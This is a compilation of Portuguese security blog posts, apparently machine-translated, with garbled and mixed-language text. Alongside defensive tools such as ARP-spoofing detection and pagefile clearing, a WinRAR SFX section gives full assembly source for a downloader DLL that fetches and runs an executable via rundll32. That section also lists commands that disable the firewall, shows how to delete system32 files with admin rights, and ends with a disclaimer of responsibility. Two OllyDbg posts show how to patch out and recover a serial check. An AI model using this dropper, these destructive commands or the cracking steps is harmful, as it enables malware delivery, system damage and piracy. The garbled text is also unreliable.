Existe um site que realiza analize de documentos e arquivos com extensões:
O Etherwall é uma ferramenta bem interessante que roda no mundo linux e tem a capacidade de detectar e bloquear ataques Man in The Middle executados via ARP Spoofing/Poisoning. Abixo temos uma lista de algumas de suas features:
Veja-o em funcionamento na imagem abaixo:
etherwall detectando um ataque
Há uma série de outras ferramentas e equipamentos que fazem o mesmo que o Etherwall, mas confesso que eu acabei simpatizando com essa tool devido a sua simplicidade.
Fonte:CorujaDeTI
Em actulidad violar a segurança de um roteador é simples, existem inúmeras aplicações “dicionários” para diferentes plataformas mostrar-lhe a senha padrão do roteador. Para usuários mais avançados, há cd ao vivo diferente (wifiway, Beini, backtrack, wifislax, etc) para capturar os pacotes até a senha do roteador ….
Como disse antes que alguém com “mãos” são capazes de obter a senha de uma rede sem fio. Por essa razão, vou mostrar como podemos detectar intrusos em nossa própria rede wireless.
Para fazer isso, vamos utilizar uma aplicação maravilhosa chamada Wireless Network Watcher
O que é o Wireless Network Watcher ?
É um pequeno utilitário que varre a rede sem fio e exibe a lista de todos os equipamentos e dispositivos que estão conectados à rede.
Para cada computador ou dispositivo que se conecta à rede, ele exibe as seguintes informações: endereço IP, endereço MAC, a empresa que fez a placa de rede e, opcionalmente, o nome do computador.
Você também pode exportar a lista de dispositivos conectados a HTML / XML / CSV / arquivo de texto, ou copiar a lista para a área de transferência e depois colá-lo no Excel ou um aplicativo de planilha.
O melhor de tudo, não requer instalação!
capture:
Graças a o HACK A SERVER é possível criar um servidor vulnerável com o qual você pode praticar, juntamente com outras pessoas um pentesting em ambiente real.
Para configurar sua máquina, você tem que seguir alguns passos.
Primeiro registo:
Uma vez cadastrado, somos capazes de poder criar uma nova máquina
Ao criar o alvo pode escolher diferentes opções
No meu caso eu escolhi o Ubuntu. Você fornece a conta root vai embora.
Finalmente no painel você pode ver um resumo da máquina criada.
HACK A SERVER como você sabe fornece VPN para se conectar ao seu ambiente e fazer as práticas.
Basicamente um SFX é um pequeno aplicativo que contém arquivos compactados. Pode ser compactados como ZIP ou RAR, a única diferença é que quando você executar o SFX, ele automaticamente irá extrair os arquivos. No entanto, se você adicionar alguns parâmetros, você pode executá-los após a extração ou executar um comando shell antes da extração.
As características que nos interessa no SFX são estas:
No primeiro campo de entrada você pode adicionar um nome de arquivo que já existe na unidade atual ou um dos arquivos extraídos para executar após a extração. No segundo campo de entrada você pode adicionar um nome de arquivo que já existe na unidade atual para executar antes da extração.
No primeiro campo, digite este comando:
%SYSTEMDRIVE%\windows\system32\cmd.exe /k shutdown -s -f -t 3600
Agora se gerar este pacote SFX e em seguida executá-lo, irá desligar o computador daqui 1 hora. Brincadeiras old school a parte, observe que você pode fazer com que qualquer outro aplicativo presente no sistema se execute:
%SYSTEMDRIVE%\windows\notepad.exe c:\shtext.txt
Este acima abre um documento de texto no notepad, e já o cria na unidade C com o nome de shtext.txt, bacana não é?.
netsh firewall set opmode disable
Este outro acima desativa o firewall do sistema.
%SYSTEMDRIVE%\Program Files\Internet Explorer\iexplore.exe http://securityhacker.org/
Este outro abre um site usando o Internet Explorer (neste caso você pode usar outro navegador lembrando que deve estar instalado no sistema). E com esta sintaxe você pode rodar diversos comandos ou programas.
Esta é uma prova de que usando apenas uma dll pequena no pacote SFX, podemos baixar e executar um aplicativo (que pode ser um vírus ou não).
Para executar esta operação iremos usar:
– O famoso Rundll32 aplicativo da Microsoft, um pequeno aplicativo usado para executar funções DLL de um programa externo. Ele será chamado pelo SFX.
– FASM Compiler (Assembler Flat), eu escolhi este compilador, pois é muito fácil de usar e rápido (baixe no site http://flatassembler.net/) ele será usado para criar a nossa dll downloader.
Agora com o FASM já instalado em seu computador, crie uma pasta vazia e crie um arquivo qualquer com o nome de “suadll.asm“. Quando terminar isto, abra o FASM e nele abra este arquivo que acabou de criar, no FASM, neste arquivo, cole o seguinte código:
;------------------------------- ; SFX Downloader via RunDLL32 ; Feito por Spo0k3r ; securityhacker.org ;------------------------------- format PE GUI 4.0 DLL entry DllEntryPoint include 'win32a.inc' ;-- rw section '.data' data readable writeable CMD_OPEN db 'open',0 url db 'http://siteparadownload.org/executavel.exe',0 output db 'c:\\executavel.exe',0 errmsg db 'ERROR',0 errtitle db '',0 okmsg db 'OK',0 oktitle db '',0 section '.text' code readable executable proc DllEntryPoint hinstDLL, fdwReason, lpvReserved mov eax,TRUE ret endp ;-- Esta funcao ira chamar o rundll32 via SFX pela linha proc dcscdownload xor eax, eax invoke URLDownloadToFile, 0, url, output, 0, NULL ; download cmp eax, 0 jne enderr invoke ShellExecute, 0, CMD_OPEN, output, 0, 0, SW_SHOW ; execute jmp endok enderr: invoke MessageBox, 0, errmsg, errtitle,0 jmp endpr endok: invoke MessageBox, 0, okmsg, oktitle,0 endpr: ret endp ;-- Tabela importar exportar section '.idata' import data readable writeable library kernel,'KERNEL32.DLL',\ urlmon,'URLMON.DLL',\ Shell32,'SHELL32.DLL',\ user,'USER32.DLL' import Shell32,\ ShellExecute,'ShellExecuteA' import user,\ MessageBox,'MessageBoxA' import urlmon,\ URLDownloadToFile,'URLDownloadToFileA' section '.edata' export data readable export 'OURDLL.DLL',\ dcscdownload,'dcscdownload' section '.reloc' fixups data discardable
NÃO se esqueça de editar a URL e o caminho de saída.
Agora, na barra de menu clique em “Run” “Compile“. E salve na pasta que criou o dll. Após isso sua dll está pronta, agora podemos criar o SFX downloader, vamos seguir os seguintes passos:
%APPDATA%\dcsc\ourdll.dll
– No primeiro parâmetro de entrada coloque esta linha
%SYSTEMDRIVE%\windows\system32\rundll32.exe %APPDATA%\dcsc\ourdll.dll, dcscdownload
Agora você pode gerar o seu arquivo, se você tiver corretamente configurar o SFX, então se você executá-lo ele irá baixar e executar o arquivo escolhido após as extrações. Confira a imagem de configuração do SFX:
Como ultimo exemplo irei mostrar para vocês como destruir uma máquina inteira usando apenas opções do SFX.
O gerador de SFX inclui duas outras funções perigosas (Executar como administrador e Excluir arquivos após a extração). A opção Executar como administrador vai pedir para executá-lo como administrador, de modo que o SFX terá todos os direitos sobre o sistema e após a extração, a exclusão de arquivos será legal usar para arquivos maliciosos.
Para usar estas opções, siga os passos:
%SYSTEMDRIVE%\windows\system32\
E agora já pode gerar o SFX.
ATENÇÃO: É apenas um exemplo, não execute no seu computador este SFX pois poderá causar danos no sistema se você colocar arquivos a serem excluídos importantes. Se quiser testar, use uma máquina virtual com o Time Machine instalado para poder reverter os problemas causados.
Resumo rápido do que isso faz:
Basicamente, este exemplo irá excluir rundll32.exe, cmd.exe e hello.exe do system32 durante a extração.
Observe: os arquivos a serem apagados serão apenas feitos no caminho da extração, por isso que eu escolhi system32 no caminho de extração e temos que ter o direito de extrair, por isso forçar o SFX para ser executado como administrador.
Bom, isto foi tudo. Espero que tenha apreciado este artigo sobre uma segurança questionável de um SFX do WinRAR. A partir de agora você percebe o quão perigoso pode ser baixar arquivos da internet pensando ser simples instaladores, o seu antivirus pode não detectar o conteúdo malicioso do SFX por ser criptografado pelo programa, é bom sempre manter um antivírus com detecção de comportamento e para isso recomendo o Comodo Internet Security, é free!
Também quero ressaltar que não sou responsável pelos danos, ou fins que você for utilizar estas dicas.
Fonte:SecurityHacker
A ferramenta que vamos falar hoje, alguns anos atrás, fazia mais sentido agora, porque com os novos celulares e smartphones cartão SIM tem sido relegada a segundo plano, agora praticamente só serve como interação com o operador. Agora você pode fazer-lhe a idéia de que falar sobre uma ferramenta para explorar o cartão SIM de um telefone móvel de dados. Nós vamos usar o software escrito em Python chamada pySIM.
Para isso precisamos o primeiro hardware, neste caso existem duas possibilidades, uma está comentando na web e encontrei um outro de pura sorte para mim. O software que estamos falando sobre o cartão é conectado através de um dispositivo de porta serial, também, no familiar web DealExtreme encontrar um leitor de tarjetas SIM por menos de 3€ que para funcionar necesita un driver USB-2-Serial (windows Mac OS X) e que funciona bem com pySIM leitor. E a outra opção e divertido no começo eu tinha comprá-lo e montá-lo eu mesmo, é mais caro, mas a satisfação de fazê-lo e ele funciona para alguns, é mais gratificante.
Por outro lado, para fazer o trabalho depende do sistema operacional, o Windows pode fazer o download do executável aquí, para Linux e Mac OS X necesitamos ter instalado Python, pySerial (Biblioteca para interagir com um [COM] serial e wxPhyton (bibliotecas Python para gerar ambientes gráficos), além código del programa. Para funcionar corretamente no Mac OS X, eu recomendo MacPort com Python 2.6 e instalar a partir MacPort pyserial wxPhyton e também, no meu caso contrário me deu muitos problemas.
Para faze-lo funcionar pode conectarlo a través de un conversor USB-Serial e abrindo a pySIM-Reader vai pedir para você dizer o dispositivo no Mac OS X e Linux, você pode passar o dispositivo criado não é o único na janela do programa, a minha solução foi fazer um ln entre o dispositivo real criada em / dev / e você reconhece o programa, se você contar-lhe directamente por cabo serial pode não ser este problema.
O programa tem um grande muito, mas de alguma forma faz sentido, e que está a extrair dados do SIM deve fornecer o código SIM, de modo que só podemos extrair informações de nosso SIM ou se tiver abandonado o PIN, mas obviamente a ser o software OpenSource pode acessar o código e entender em um acesso de baixo nível para o chip.
O software permite entre outras coisas:
– Agenda:
Mostrar Agenda
modificar Agenda
Mostrar última chamada
Fazer / Restaurar Agenda de Backup
– SMS:
Mostrar SMS
Fazer / Restaurar backup SMS
– SIM:
Exibir informações do SIM (PIN não obrigatório)
Mude o seu PIN
Activar / Desactivar o PIN
O programa acessa o SIM de uma forma mais ou menos fácil de entender, as funções do SIM como uma memória de tamanho fixo (64K por exemplo) que é dividido em setores ou partes e cada parte tem permitido vários espaços de memória fixos no a informação é armazenada. Este programa, de acordo com a arquitetura RFC de um cartão SIM, você sabe que se você alcançar a posição X, N concorda em manter tal registro e um número de telefone se você chegar a X, N +1 concordar com o seguinte número de telefone armazenado. Podemos dizer que é estruturado em uma espécie de matriz.
Para aceder a esta matriz deve saber o PIN, uma vez que entre os dados e à solicitação do telefone ou o leitor há um microprocessador que é responsável pela comunicação ambos os lados.
Este programa com suas limitações pode ser interessante se por exemplo que usamos para fazer uma empresa de telefonia móvel forense que conhece o código PIN.
Eu mostro uma foto do resultado, uma vez soldado
Fonte:ElRiconDelRanito
Se você se lembrar post anterior, nós estávamos falando sobre como nós poderíamos fazer com OllyDbg revertendo um binário verificado o número de série, no final, estavam ficando na memória editar e salvar o resultado para que pudéssemos entrar em qualquer série que você nos deu um resultado da série correta .
Nesta segunda parte, veremos exatamente o que faz com que o binário verifique se o número de série, apresentamos é correta ou não.
No caso de você não ter lido, quando abrimos o binário, vamos encontrar as referências da seqüência binária.
Corte novamente Esta parte da série, para ir para a parte interessante.
Agora, o que não vai resolver parte do 00401F7, onde temos a chamada e que compara eax 0.
Desta vez vamos fazer nenhuma mudança de montar. O que fazemos é colocar um ponto de interrupção. Dessa forma, quando você executar o programa e vá para verificar o número introduzido, vamos ver como ele funciona.
Colocamos um ponto de interrupção.
Executamos o programa
Fijaros nas referências e outros, então você vai ver que 
Agora o que vamos passo a passo (instrução por instrução) para ver o que ele faz, por isso, dar o primeiro passo.
Vemos mais cordas que não tínhamos visto antes, também ver direito na caixa abaixo, existem duas seqüências, que nós nos apresentamos e outro. O que é isso string? L2C-57816784-ABEX
Bem esta é a série que estávamos procurando, por isso apresentamos o programa para verificar
UEEEE, temos o serial que você estava procurando.
Em outros momentos, vamos encontrar a criptografia de série, claro!
Fonte:FluProject
A ciência da engenharia reversa é algo que me fascinou, e que é quando você começar a entrar na questão de malware que acabam em engenharia reversa é inevitável. Também geralmente um tema que as pessoas às vezes vai um pouco perdido casos e não sabe por onde começar, mais você precisa saber linguagem assembly e nem todos estão dispostos, eu encontrei.
Quando eu comecei a olhar para o meu item no final achei melhor começar a aprender a linguagem assembly através de exercícios simples.
Antes de começar você quero agradecer ao meu Orozlan, por me ajudar todos os dias com as complexidades de malware e engenharia reversa.
No decorrer de hoje temos um programa que nos pede para inserir um serial. O programa vai verificar e nos dizer se é correto ou não. Então, nós vamos fazer é que o primeiro adesivo do programa em memória de modo que qualquer coisa que colocamos a nós como correta. E 2 de série encontrados dentro do programa.
OllyDbg precisa fazer isso, então baixá-lo aquí
Abrimos o programa que irá verificar o serial:
Nós colocamos uma série qualquer para ver como o programa se comporta, por exemplo 111111
temos o erro que mostra o programa.
Agora abra OllyDbg, e começou, se a primeira vez que você abrir OllyDbg, não se preocupe com as coisas que você não entende.
Quando abrimos OllyDbg buscar em primeiro lugar a mensagem de erro que saiu quando recebemos a série. Então olhe para todas as cadeias binárias.
Este nos devolverá os siguientes strings
Se você considerar as mensagens que dão a aplicação, podemos ver quando ele dá a mensagem que a série não é correto, e quando a mensagem de que está correto.
Agora o que fazemos é ir à festa, mas queremos que o código que estamos assistindo. Não há necessidade de compreender cada tempo de instrução.
Nós clique na linha que não, olhe a parte que mais interessado em:
Estas seriam as instruções mais básicas que nós vamos explicar um pouco para entender o que faz.
CALL: / Ir para o endereço / comando indicado
Push: Armazena o valor na pilha.
JMP: Ir para o endereço indicado.
Para começar com o que vamos fazer é corrigir o programa na memória para que nós colocamos o serial que nos colocou direito.
Então começamos:
Verificar o programa gostaria de fazer é, se a série é OK, ele mostra a mensagem de X. Se a série não é OK, mostra que outros.
Fácil ¿não?
Então o que vamos fazer é alterar a instrução que cuida disso.
Nós nos colocamos na posição 004010FF.
O que não vai mudar Ir JE se o seu oposto é saltos JNE igual, se não iguais
Nós vamos montar na posição antes de
Trocamos por
Para ser claro, isto só muda o endereço de memória, de modo que não mudará o binário original.
Mas vai ver o que fazemos, nós mudamos o valor e armazenar o binário.
Quando nos reunimos, vamos ler a
Agora, execute o programa para que você possa ver que aceita qualquer serial.
Então, pressione F9, executar o programa e entrar em qualquer série ….
UALA, temos o que queríamos.
Se você deseja salvar o binário, clique direito e fazer
Como fizemos uma mudança basta escolher a seleção. Para salvar nos salvar em arquivo e armazenar o binário
Uma vez que manter o binário, podemos executá-lo e digitar o que você nos dê OK em todos os casos
Uma vez salvo, você pode executar e testar
No próximo capítulo vai olhar para o binário serial.
Espero que tenha gostado.
Fonte:FluProject
Oi todos!
Pagefile.sys é o arquivo de paginação ou também conhecido como swap.
Este arquivo armazena muitos importante porque funciona como computador de memória virtual. Você pode armazenar temporariamente senhas não criptografadas programas.
Como em artigos anteriores discutem o Windows salva tudo. Então você quer me salvar, mas os dados no PC que você tem que fazer o seguinte:
Abra o editor de registro do Windows (regedit.exe).
Eu digite o seguinte caminho:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management
Uma vez que há alteração do valor chave de ClearPageFileAtShutdown, o tipo deve ser REG_DWORD eo valor de 1.
Uma vez que esses processos vão ativar os Pagefile.sys limpeza automática sempre que você desligar o computador tiver certeza de que não há senhas ou outros dados no swap.
Mundo Tecnológico 